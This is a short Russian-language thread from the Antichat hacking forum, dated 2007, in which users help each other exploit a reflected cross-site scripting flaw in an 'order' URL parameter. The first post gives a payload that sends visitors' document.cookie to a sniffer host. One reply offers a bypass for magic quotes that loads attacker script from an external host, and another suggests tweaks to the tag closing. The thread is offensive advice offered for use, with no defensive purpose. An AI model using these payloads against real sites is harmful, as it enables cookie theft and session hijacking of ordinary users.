Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Как, (https://forum.antichat.xyz/showthread.php?t=54181)

x-demon

22.11.2007 21:04

Как,

Короче есть уязвимость. Но на сервере включены magic quotes.
Как обойти? xss пасивная
somesite/?order=%22%3E%3Cscript%3Edocument.location.href=%2 7javascript:http://snfiffaddr.tld/s.gif?%27+document.cookie;%3C/script%3E

+toxa+

22.11.2007 21:25

somesite/?order=<script src=http://hek.ru/1.js></script>

в 1.js пишешь нужный те код

ReVOLVeR

07.12.2007 22:22

если вдруг не выполнится посмотри в исходник страницы, найди строку, глянь может надо добавить /> после order=

Время: 17:36